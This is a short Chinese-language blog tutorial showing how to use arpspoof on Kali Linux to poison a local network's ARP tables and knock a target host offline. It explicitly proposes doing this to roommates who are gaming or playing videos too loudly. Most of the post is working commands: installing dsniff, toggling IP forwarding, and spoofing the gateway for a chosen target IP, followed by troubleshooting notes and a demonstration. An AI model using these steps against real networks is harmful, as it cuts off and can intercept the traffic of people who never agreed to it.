简单的ARP欺骗断网

简单的ARP欺骗断网

前言：

舍友打游戏、放抖音太吵了？是时候给他们点教训了，让他们感受到什么叫原始生活。（滑稽）

实施一个简单的ARP欺骗，实现断网操作。

Arp欺骗：

Arpspoof安装：在kali终端输入：apt-get install dsniff ssldump

检查是否安装好：arpspoof

特殊情况--kali更好镜像源:

vim /etc/apt/sources.list进入vim编辑模式，复制下列的镜像源

# deb kali-rolling main non-free contrib

# deb-src kali-rolling main non-free contrib

输入(:wq)保存退出vim编辑模式

apt-get update    # 更新软件列表,必须先操作

apt-get upgrade #正在更新软件

# 或者 apt dist-upgrade 一种不安全的升级,有可能有依赖导致软件错误.少用

Arpspoof的使用：

arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host//基本命令格式

echo 1 >/proc/sys/net/ipv4/ip_forward #开启端口转发

cat /proc/sys/net/ipv4/ip_forward      #检测端口是否开启(1为开启  0为关闭)

echo 0 >/proc/sys/net/ipv4/ip_forward #关闭端口转发

arpspoof -i eth0 -t <攻击的IP> <网关>

注意事项：

1、网卡不对，一般来说默认的网卡就是eth0，也有可能是其它的，具体需要查看了才知道。

2、IP不存在或者IP地址错误，这里主要说的是192.168.1.104，有可能你的物理电脑局域网IP不是这个。

3、不同局域网内的IP之间不能进行ARP欺骗，这个是非常重要的。

4、IP不在同一网段，arpspoof此命令必须要保证IP都是同一网段的。如果网络配置有问题可以看看我的另一篇讲KALI网络配置的：

KALI-LINUX桥接模式下网络配置（学习笔记）_aarong的博客-CSDN博客

5、如果网络用的是WLAN的话，IP地址是会变化的！！！！

看看被攻击者的网络是否正常(断网操作！！！)

实践操作

在一台主机上用浏览器打开百度：

 在kali上伪造网关（当然这是要通过信息收集得到的主机网关，我这里只做演示）：

在另一台主机上查看效果：

无论打开什么网页都无法连接了 ，实验结束。